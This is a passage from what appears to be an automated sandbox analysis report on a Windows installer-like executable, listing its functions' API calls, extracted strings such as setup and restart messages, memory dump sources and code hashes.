                                                                                                      • Sleep.KERNEL32(000000FA,?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00458E7D
                                                                                                      Strings
                                                                                                      • Helper process exited, but failed to get exit code., xrefs: 00458E53
                                                                                                      • Stopping 64-bit helper process. (PID: %u), xrefs: 00458DD1
                                                                                                      • Helper process exited., xrefs: 00458E29
                                                                                                      • Helper process exited with failure code: 0x%x, xrefs: 00458E47
                                                                                                      • Helper isn't responding; killing it., xrefs: 00458DEB
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseHandleProcess$CodeExitObjectSingleSleepTerminateWait
                                                                                                      • String ID: Helper isn't responding; killing it.$Helper process exited with failure code: 0x%x$Helper process exited, but failed to get exit code.$Helper process exited.$Stopping 64-bit helper process. (PID: %u)
                                                                                                      • API String ID: 3355656108-1243109208
                                                                                                      • Opcode ID: e1e6f1a428ddc606cbac7e5be58ccbeaead76fc5c320782193580adc03ed748c
                                                                                                      • Instruction ID: b06cb4cb11178ece3cea1db1bc2ca69ea432733d5239d7d0987fb8f0d427a68f
                                                                                                      • Opcode Fuzzy Hash: e1e6f1a428ddc606cbac7e5be58ccbeaead76fc5c320782193580adc03ed748c
                                                                                                      • Instruction Fuzzy Hash: D9216D706047009AD720E679C44275BB6E59F08709F04CC2FB999EB293DF78E8488B2A
                                                                                                      Function 00454514 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 228registryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 0042DDF4: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DE20
                                                                                                      • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,004546EB,?,00000000,004547AF), ref: 0045463B
                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,00000000,00000004,00000000,00000001,?,00000000,?,00000000,004546EB,?,00000000,004547AF), ref: 00454777
                                                                                                        • Part of subcall function 0042E8D8: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,0045325F,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8F7
                                                                                                      Strings
                                                                                                      • , xrefs: 0045459D
                                                                                                      • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00454553
                                                                                                      • RegCreateKeyEx, xrefs: 004545AF
                                                                                                      • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00454583
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseCreateFormatMessageQueryValue
                                                                                                      • String ID: $RegCreateKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                                                      • API String ID: 2481121983-1280779767
                                                                                                      • Opcode ID: a579990beb4c9b51ec5b3fea0749880c5f06a70a884d2fa71269d98e88c3cf61
                                                                                                      • Instruction ID: a200d9e45076b9aa1c9026ee470310bfc0f5ccdb1a8093a9a555fb12639cba12
                                                                                                      • Opcode Fuzzy Hash: a579990beb4c9b51ec5b3fea0749880c5f06a70a884d2fa71269d98e88c3cf61
                                                                                                      • Instruction Fuzzy Hash: 6C81DE75A00209AFDB00DFD5C941BDFB7F9EB49309F50442AE901FB282D7789A45CB69
                                                                                                      Function 00496620 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 141fileCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 004538A8: CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,004967F1,_iu,?,00000000,004539E2), ref: 00453997
                                                                                                        • Part of subcall function 004538A8: CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,004967F1,_iu,?,00000000,004539E2), ref: 004539A7
                                                                                                      • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 0049669D
                                                                                                      • SetFileAttributesA.KERNEL32(00000000,00000080,00000000,004967F1), ref: 004966BE
                                                                                                      • CreateWindowExA.USER32(00000000,STATIC,00496800,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 004966E5
                                                                                                      • SetWindowLongA.USER32(?,000000FC,00495E78), ref: 004966F8
                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,004967C4,?,?,000000FC,00495E78,00000000,STATIC,00496800), ref: 00496728
                                                                                                      • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 0049679C
                                                                                                      • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,004967C4,?,?,000000FC,00495E78,00000000), ref: 004967A8
                                                                                                        • Part of subcall function 00453D1C: WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453E03
                                                                                                      • 73A15CF0.USER32(?,004967CB,00000000,00000000,00000000,00000000,00000000,00000097,00000000,004967C4,?,?,000000FC,00495E78,00000000,STATIC), ref: 004967BE
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileWindow$CloseCreateHandle$AttributesCopyLongMultipleObjectsPrivateProfileStringWaitWrite
                                                                                                      • String ID: /SECONDPHASE="%s" /FIRSTPHASEWND=$%x $STATIC
                                                                                                      • API String ID: 170458502-2312673372
                                                                                                      • Opcode ID: c09fb920bc7669bd65d78bc4791726942d010f86c1ff051557e4c77676e60077
                                                                                                      • Instruction ID: 3fac7199250898b77632ea887e905273a0ca2a52c1bf25bf17bddf130f7f486a
                                                                                                      • Opcode Fuzzy Hash: c09fb920bc7669bd65d78bc4791726942d010f86c1ff051557e4c77676e60077
                                                                                                      • Instruction Fuzzy Hash: EE413D70A44208AFDF01EFA5DC42F9E7BB8EB09714F61457AF500F7291D6799E008BA8
                                                                                                      Function 0042E428 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 86registrylibraryloaderCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,0042E52D,?,00000000,0047E1E8,00000000), ref: 0042E451
                                                                                                      • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042E457
                                                                                                      • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,0042E52D,?,00000000,0047E1E8,00000000), ref: 0042E4A5
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressCloseHandleModuleProc
                                                                                                      • String ID: .DEFAULT\Control Panel\International$=aE$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                                                                      • API String ID: 4190037839-1003587384
                                                                                                      • Opcode ID: 71ec1778410e517379c49e62a4abf791b893e005234a700e60dfa1d7d317b6f8
                                                                                                      • Instruction ID: 6214d84d9e891aa165dd1588e79579c1e4a82babed7fc21810c195be89e1891e
                                                                                                      • Opcode Fuzzy Hash: 71ec1778410e517379c49e62a4abf791b893e005234a700e60dfa1d7d317b6f8
                                                                                                      • Instruction Fuzzy Hash: 65215230B10219ABCB10EAE7DC45A9E77A8EB04318FA04877A500E7281EB7CDE41CA5C
                                                                                                      Function 00462D5C Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 82libraryloaderCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetActiveWindow.USER32 ref: 00462D68
                                                                                                      • GetModuleHandleA.KERNEL32(user32.dll), ref: 00462D7C
                                                                                                      • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 00462D89
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00462D96
                                                                                                      • GetWindowRect.USER32(?,00000000), ref: 00462DE2
                                                                                                      • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,00000000), ref: 00462E20
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                                                                      • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                                                                      • API String ID: 2610873146-3407710046
                                                                                                      • Opcode ID: 07f038a1b45edca227de97dbc4e3a49cc5475e4390ab333f174a5f731d21d9c4
                                                                                                      • Instruction ID: 308e9426e96dcd15a0811dc773674cbbce9379ede84ac64ebea6e7762974983c
                                                                                                      • Opcode Fuzzy Hash: 07f038a1b45edca227de97dbc4e3a49cc5475e4390ab333f174a5f731d21d9c4
                                                                                                      • Instruction Fuzzy Hash: 8421A775701B046FD3019A64DD41F3B3395DB94714F08453AF944EB381E6B9EC018A9A
                                                                                                      Function 0042F198 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 82libraryloaderCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetActiveWindow.USER32 ref: 0042F1A4
                                                                                                      • GetModuleHandleA.KERNEL32(user32.dll), ref: 0042F1B8
                                                                                                      • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 0042F1C5
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0042F1D2
                                                                                                      • GetWindowRect.USER32(?,00000000), ref: 0042F21E
                                                                                                      • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D), ref: 0042F25C
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                                                                      • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                                                                      • API String ID: 2610873146-3407710046
                                                                                                      • Opcode ID: fc179306045cef01cc7feea5ef12c7621bc9e212612d9656ab7fba5f67810d88
                                                                                                      • Instruction ID: f96f766bc13e38d455a6b30724ea53c80225cfaaeacd9570d6dca051b777ffc7
                                                                                                      • Opcode Fuzzy Hash: fc179306045cef01cc7feea5ef12c7621bc9e212612d9656ab7fba5f67810d88
                                                                                                      • Instruction Fuzzy Hash: 3221D7797057149BD300D664ED81F3B33A4DB85B14F88457AF944DB381D679EC044BA9
                                                                                                      Function 00458F80 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 127pipeCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,0045915F,?,00000000,004591C2,?,?,02073858,00000000), ref: 00458FDD
                                                                                                      • TransactNamedPipe.KERNEL32(?,-00000020,0000000C,-00004034,00000014,02073858,?,00000000,004590F4,?,00000000,00000001,00000000,00000000,00000000,0045915F), ref: 0045903A
                                                                                                      • GetLastError.KERNEL32(?,-00000020,0000000C,-00004034,00000014,02073858,?,00000000,004590F4,?,00000000,00000001,00000000,00000000,00000000,0045915F), ref: 00459047
                                                                                                      • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00459093
                                                                                                      • GetOverlappedResult.KERNEL32(?,?,00000000,00000001,004590CD,?,-00000020,0000000C,-00004034,00000014,02073858,?,00000000,004590F4,?,00000000), ref: 004590B9
                                                                                                      • GetLastError.KERNEL32(?,?,00000000,00000001,004590CD,?,-00000020,0000000C,-00004034,00000014,02073858,?,00000000,004590F4,?,00000000), ref: 004590C0
                                                                                                        • Part of subcall function 00453488: GetLastError.KERNEL32(00000000,0045401D,00000005,00000000,00454052,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,00497D75,00000000), ref: 0045348B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$CreateEventMultipleNamedObjectsOverlappedPipeResultTransactWait
                                                                                                      • String ID: CreateEvent$TransactNamedPipe
                                                                                                      • API String ID: 2182916169-3012584893
                                                                                                      • Opcode ID: 1e3f92d8c22a05294e06b5c780760953f793dd62cf34ae2b617d69319ed8131f
                                                                                                      • Instruction ID: 50fb7c1009465aa7c5405e125e9101384e11cc4d6b330c20a7fc1de2f8ccdd80
                                                                                                      • Opcode Fuzzy Hash: 1e3f92d8c22a05294e06b5c780760953f793dd62cf34ae2b617d69319ed8131f
                                                                                                      • Instruction Fuzzy Hash: 68417F71A00608EFDB15DF99C985F9EB7F9EB08714F1044AAF904E72D2C6789E44CB28
                                                                                                      Function 00456B58 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 99libraryloaderCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetModuleHandleA.KERNEL32(OLEAUT32.DLL,UnRegisterTypeLib,00000000,00456CBD,?,?,00000031,?), ref: 00456B80
                                                                                                      • GetProcAddress.KERNEL32(00000000,OLEAUT32.DLL), ref: 00456B86
                                                                                                      • LoadTypeLib.OLEAUT32(00000000,?), ref: 00456BD3
                                                                                                        • Part of subcall function 00453488: GetLastError.KERNEL32(00000000,0045401D,00000005,00000000,00454052,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,00497D75,00000000), ref: 0045348B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressErrorHandleLastLoadModuleProcType
                                                                                                      • String ID: GetProcAddress$ITypeLib::GetLibAttr$LoadTypeLib$OLEAUT32.DLL$UnRegisterTypeLib$UnRegisterTypeLib
                                                                                                      • API String ID: 1914119943-2711329623
                                                                                                      • Opcode ID: 1f12b3bfc7457beb1676229d9a9ac5705a2be6c49cf36285249ab65db7443b7f
                                                                                                      • Instruction ID: a27b950e9f8baa5d3fd7d83d3f5f0f06fd95d714c0010da27a3b0cf72a10e13f
                                                                                                      • Opcode Fuzzy Hash: 1f12b3bfc7457beb1676229d9a9ac5705a2be6c49cf36285249ab65db7443b7f
                                                                                                      • Instruction Fuzzy Hash: AB319471B00604AFDB12EFAACC41D5BB7BDEB897557528466FC04D7252DA38DD04CB28
                                                                                                      Function 00416D90 Relevance: 15.2, APIs: 10, Instructions: 167windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • RectVisible.GDI32(?,?), ref: 00416E23
                                                                                                      • SaveDC.GDI32(?), ref: 00416E37
                                                                                                      • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00416E5A
                                                                                                      • RestoreDC.GDI32(?,?), ref: 00416E75
                                                                                                      • CreateSolidBrush.GDI32(00000000), ref: 00416EF5
                                                                                                      • FrameRect.USER32(?,?,?), ref: 00416F28
                                                                                                      • DeleteObject.GDI32(?), ref: 00416F32
                                                                                                      • CreateSolidBrush.GDI32(00000000), ref: 00416F42
                                                                                                      • FrameRect.USER32(?,?,?), ref: 00416F75
                                                                                                      • DeleteObject.GDI32(?), ref: 00416F7F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
                                                                                                      • String ID:
                                                                                                      • API String ID: 375863564-0
                                                                                                      • Opcode ID: e9e72d8966bdaf80817d84d11445bcfe7b70581a29c6dab9ad28bd9778771da1
                                                                                                      • Instruction ID: 305d9ddf0f7240c011be45b7bb8b7ddc49b42f68556790db257713301bb8c367
                                                                                                      • Opcode Fuzzy Hash: e9e72d8966bdaf80817d84d11445bcfe7b70581a29c6dab9ad28bd9778771da1
                                                                                                      • Instruction Fuzzy Hash: FC514C712086445FDB54EF69C8C0B9777E8AF48314F15466AFD488B287C738EC85CB99
                                                                                                      Function 00404ABF Relevance: 15.1, APIs: 10, Instructions: 122fileCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B46
                                                                                                      • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B6A
                                                                                                      • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B86
                                                                                                      • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00404BA7
                                                                                                      • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00404BD0
                                                                                                      • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00404BDA
                                                                                                      • GetStdHandle.KERNEL32(000000F5), ref: 00404BFA
                                                                                                      • GetFileType.KERNEL32(?,000000F5), ref: 00404C11
                                                                                                      • CloseHandle.KERNEL32(?,?,000000F5), ref: 00404C2C
                                                                                                      • GetLastError.KERNEL32(000000F5), ref: 00404C46
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                                                      • String ID:
                                                                                                      • API String ID: 1694776339-0
                                                                                                      • Opcode ID: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                                                                      • Instruction ID: 0555156f4d2a620bb114dc01d937536d57074fdea11cd86abdfeb4dd56d828b4
                                                                                                      • Opcode Fuzzy Hash: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                                                                      • Instruction Fuzzy Hash: 3741B3F02093009AF7305E248905B2375E5EBC0755F208E3FE296BA6E0D7BDE8458B1D
                                                                                                      Function 004221F8 Relevance: 15.1, APIs: 10, Instructions: 74windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetSystemMenu.USER32(00000000,00000000), ref: 00422243
                                                                                                      • DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 00422261
                                                                                                      • DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0042226E
                                                                                                      • DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0042227B
                                                                                                      • DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00422288
                                                                                                      • DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 00422295
                                                                                                      • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 004222A2
                                                                                                      • DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 004222AF
                                                                                                      • EnableMenuItem.USER32(00000000,0000F020,00000001), ref: 004222CD
                                                                                                      • EnableMenuItem.USER32(00000000,0000F030,00000001), ref: 004222E9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Menu$Delete$EnableItem$System
                                                                                                      • String ID:
                                                                                                      • API String ID: 3985193851-0
                                                                                                      • Opcode ID: 510ebc35eb44907ae1e975f945bfd8864758d272309f2385250dfef8029dc5ab
                                                                                                      • Instruction ID: b791af981bedf3385b2dd143af085cc0c004e448fbd85fce69a0ff0a91ac5271
                                                                                                      • Opcode Fuzzy Hash: 510ebc35eb44907ae1e975f945bfd8864758d272309f2385250dfef8029dc5ab
                                                                                                      • Instruction Fuzzy Hash: 35213370340744BAE720D725DD8BF9B7BD89B04718F4440A5BA487F2D7C7F9AA80869C
                                                                                                      Function 004812DC Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 175windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • FreeLibrary.KERNEL32(10000000), ref: 00481499
                                                                                                      • FreeLibrary.KERNEL32(02380000), ref: 004814AD
                                                                                                      • SendNotifyMessageA.USER32(00020420,00000496,00002710,00000000), ref: 0048151F
                                                                                                      Strings
                                                                                                      • DeinitializeSetup, xrefs: 00481395
                                                                                                      • GetCustomSetupExitCode, xrefs: 00481339
                                                                                                      • Deinitializing Setup., xrefs: 004812FA
                                                                                                      • Restarting Windows., xrefs: 004814FA
                                                                                                      • Not restarting Windows because Setup is being run from the debugger., xrefs: 004814CE
